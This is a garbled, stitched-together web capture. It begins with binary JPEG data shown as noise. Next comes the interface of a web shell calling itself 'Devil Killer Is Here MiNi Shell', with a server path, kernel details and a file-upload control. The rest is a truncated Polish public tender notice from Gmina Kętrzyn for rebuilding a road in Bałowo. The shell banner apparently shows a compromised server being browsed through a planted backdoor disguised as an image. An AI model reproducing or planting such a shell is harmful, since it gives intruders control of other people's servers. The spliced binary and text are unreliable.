JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210715/0011507101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00115071 z dnia 2021-07-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Doprowadzenie do należytego stanu technicznego ciągu komunikacyjnego zlokalizowanego w granicach działki nr 17 obrębu Bałowo oraz działki nr 14, 22 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KĘTRZYN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510742876</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kętrzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">897512474</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">897512746</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">anna.grabias@gminaketrzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gminaketrzyn.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Doprowadzenie do należytego stanu technicznego ciągu komunikacyjnego zlokalizowanego w granicach działki nr 17 obrębu Bałowo oraz działki nr 14, 22 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2e481fe8-e499-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00115071</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006959/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Doprowadzenie do należytego stanu technicznego ciągu komunikacyjnego zlokalizowanego w granicach działki nr 17 obrębu Bałowo oraz działki nr 14, 22</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.gminaketrzyn.pl/zamowienia_publiczne/50/status/0/rodzaj/0/wzp/zwr/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod<br/>adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej anna.grabias@gminaketrzyn.pl<br/>(nie dotyczy składania ofert). https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”. 2. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). 3.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany,wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.4. Za<br/>datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP lub pocztę elektroniczną. 5. Zamawiający przekazuje link do postępowania oraz<br/>ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej z zakładki Postępowania. 6. Podpisy kwalifikowane wykorzystywane przez wykonawców do<br/>podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w<br/>sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na<br/>rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”. 7. W przypadku wykorzystania<br/>formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej ilości plików<br/>tj.podpisywanych plików z danymi oraz plików XAdES. 8. Zgodnie z art. 8 ust. 3 ustawy Pzp, nie<br/>ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o<br/>zwalczaniu nieuczciwej konkurencji. Jeżeli wykonawca, nie później niż w terminie składania ofert, w<br/>sposób niebudzący wątpliwości zastrzegł, że nie mogą być one udostępniane oraz wykazał,<br/>załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. 9.<br/>Każdy z wykonawców może złożyć tylko jedną ofertę. Złożenie większej liczby ofert lub oferty<br/>zawierającej propozycje wariantowe spowoduje odrzucenie ofert. 10. Ceny oferty muszą zawierać<br/>wszystkie koszty,jakie musi ponieść wykonawca, aby zrealizować zamówienie z najwyższą<br/>starannością oraz ewentualne rabaty. 11. Dokumenty i oświadczenia składane przez wykonawcę<br/>powinny być w języku polskim. W przypadku załączenia dokumentów sporządzonych w innym języku<br/>niż dopuszczony,wykonawca zobowiązany jest załączyć tłumaczenie na język polski. 12. Zgodnie z<br/>definicją dokumentu elektronicznego z art. 3 ustęp 2 Ustawy o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne, opatrzenie pliku zawierającego skompresowane dane kwalifikowanym<br/>podpisem elektronicznym jest jednoznaczne z podpisaniem oryginału dokumentu, z wyjątkiem<br/>kopii poświadczonych odpowiednio przez innego wykonawcę ubiegającego się wspólnie z nim o<br/>udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega wykonawca, albo<br/>przez podwykonawcę. 13. Wszystkie koszty związane z uczestnictwem w postępowaniu, w<br/>szczególności z przygotowaniem i złożeniem oferty ponosi Wykonawca składający ofertę. Zamawiający<br/>nie przewiduje zwrotu kosztów udziału w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, informuję, że: 1. Administratorem Pani/Pana danych<br/>osobowych jest Gmina Kętrzyn, Tadeusza Kościuszki 2, 11-400 Kętrzyn. 2. W sprawach z zakresu<br/>ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych ( IOD).<br/>Funkcję tę sprawuje: Rafał Andrzejewski. Kontakt z IOD pod adresem<br/>email:iod.r.andrzejewski@szkoleniaprawnicze.com.pl oraz telefonicznie pod nr telefonu: 504 976<br/>690.3.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w zw. z<br/>ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U.2019.2019), dalej „ustawa Pzp”<br/>w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w<br/>trybie podstawowym. 4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty,<br/>którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>5.Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres<br/>4lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący<br/>jego nienaruszalność, jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego<br/>przekracza 4lata, zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały<br/>okres obowiązywania umowy w sprawie zamówienia publicznego. 6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp. 7. W odniesieniu<br/>do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22RODO. 8. Posiada Pani/Pan:a. na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących. • W przypadku korzystania z tego uprawnienia,<br/>zamawiający może żądać wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia (zgodnie z art. 75 ustawy Pzp). • W<br/>przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 RODO (74 ust. 3 ustawy Pzp) b. na podstawie art. 16 RODO prawo do sprostowania / uzupełnienia<br/>Pani/Pana danych osobowych. Skorzystanie przez osobę, której dane dotyczą, z tego uprawnienia• nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą (zgodnie z art. 19 ust. 2<br/>ustawy Pzp); • nie może naruszać integralności protokołu oraz jego załączników (zgodnie z art. 76<br/>ustawy Pzp). W przypadku danych osobowych zamieszczonych przez zamawiającego w Biuletynie<br/>Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są<br/>wykonywane w drodze żądania skierowanego do zamawiającego.c. na podstawie art. 18 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO*. W postępowaniu o udzielenie zamówienia<br/>zgłoszenie żądania ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania (art. 19 ust. 3 ustawy Pzp)d. prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych O .... cd. w SWZ postępowania</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz Ogłoszenie pkt RODO (obowiązek informacyjny)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGG.271.47.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje przebudowę drogi wewnętrznej w miejscowości Bałowo (nie cały zakres objęty projektem). W zakres zamówienia wchodzi część obejmująca:<br/>1)	działka nr 17 – przebudowa odcinka 198 m drogi (zakres zgodnie z przedmiarem) wraz z oznakowaniem (projekt stałej organizacji ruchu)<br/>2)	działka nr 14 – przebudowa odcinka 40 m drogi (zakres zgodnie z przedmiarem)<br/>3)	działka nr 22 – przebudowa zjazdu, połączenie z drogą powiatową nr 1733 N Kętrzyn – Nakomiady - Ryn<br/><br/>Podstawowe parametry projektowe.<br/>Trasa przebiega śladem istniejącym. Przyjęto następujące parametry:<br/>Droga główna:<br/>•	klasa drogi: D,<br/>•	kategoria drogi: wewnętrzna,<br/>•	kategoria ruchu: KR2,<br/>•	prędkość projektowana: V p = 30km/h,<br/>•	przekrój poprzeczny: 1x2,<br/>•	przekrój uliczny,<br/>•	szerokość pasa ruchu 2,50 m, <br/>•	pobocze obustronne 2x 0,75m,<br/><br/>Celem przedsięwzięcia jest podniesienie bezpieczeństwa i komfortu ruchu poprzez poprawę stanu nawierzchni.<br/><br/>Projektowana konstrukcja nawierzchni dla kategorii ruchu KR 2:<br/>•	warstwa ścieralna z betonu asfaltowego AC 11S 50/70 gr. 4 cm<br/>•	warstwa wiążąca z betonu asfaltowego AC 16W 35/50 gr. 6 cm<br/>•	wyrównanie istniejącej nawierzchni jako podbudowy betonem<br/>asfaltowym AC 16W 35/50 w ilości średnio 150 kg/m2 min. gr. 2 cm<br/>•	istniejąca nawierzchnia bitumiczna<br/><br/>Podbudowa na poszerzeniu:<br/>•	mieszanka niezwiązana 0/31 z kruszywem C 50/30 gr. 22 cm<br/>•	warstwa gruntu stabilizowanego cementem C 1,5/2<4,0 MPa gr. 15 cm<br/><br/>Zjazdy:<br/>•	grafitowa brukowa kostka betonowa gr. 8 cm<br/>•	podsypka cementowo-piaskowa 1:4 gr. 3 cm<br/>•	podbudowa: mieszanka niezwiązana 0/31 z kruszywem C 50/30 gr. 15 cm<br/>•	ulepszone podłoże warstwą gruntu stabilizowanego cementem<br/>C 1,5/2<4,0 MPa gr. 15 cm<br/><br/>Umocnienie poboczy:<br/>•	mieszanka niezwiązana 0/31 z kruszywem C 50/30 gr. 16 cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje dla każdej części zamówienia możliwość udzielenia zamówienia, o którym mowa w art. 214 ust.1 pkt 7 ustawy, zgodnego z przedmiotem niniejszego zamówienia, polegającego na wykonaniu robót budowlanych podobnych do objętych niniejszym zamówieniem, tj. zamówienia polegającego na powtórzeniu wszystkich lub części z rodzajów robót budowlanych objętych niniejszym zamówieniem, o wielkości nie większej niż 50% wartości szacunkowej brutto, ustalonej na podstawie kosztorysu inwestorskiego zamówienia podstawowego. Warunki udzielenia tego zamówienia zgodne będą z warunkami określonymi<br/>w SWZ dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Złożone oferty, które nie podlegają odrzuceniu zostaną ocenione zgodnie z następującymi kryteriami: Cena brutto (C) – waga 60% Okres gwarancji jakości i rękojmi (G) – waga40% Sposób punktacji w ramach kryteriów zawiera SWZ postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1. zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie.<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie. <br/>3. sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie. <br/>4. zdolności technicznej lub zawodowej: Wykonawca spełni ten warunek jeżeli wykaże, że:<br/>4.1. w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali co najmniej 1 robotę budowlaną polegającą na budowie, remoncie lub przebudowie drogi o nawierzchni z betonu asfaltowego o wartości min. 200.000,00 zł brutto.<br/>4.2.	dysponuje co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub inne uprawnienia budowlane umożliwiające wykonywanie tych samych czynności w aktualnym stanie prawnym, w zakresie odpowiednim do zakresu zamówienia, oraz spełniającą warunki do wykonywania tych funkcji, tzn. będącą członkiem właściwej izby samorządu zawodowego <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykaz robót budowlanych według wzoru stanowiącego załącznik do SWZ, Wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów (np. zaświadczeń, referencji), określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone; z treści wykazu musi wynikać, iż Wykonawca spełnia warunek określony w rozdziale VII pkt 2.4.1 SWZ;<br/>- wykaz osób według wzoru stanowiącego załącznik do SWZ, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; z treści wykazu musi wynikać, iż wykonawca spełnia warunek określony w rozdziale VII pkt 2.4.2 SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie 5.000,00 PLN (pięć tysięcy złotych),<br/>2)	Wadium musi obejmować pełen okres związania ofertą tj. do 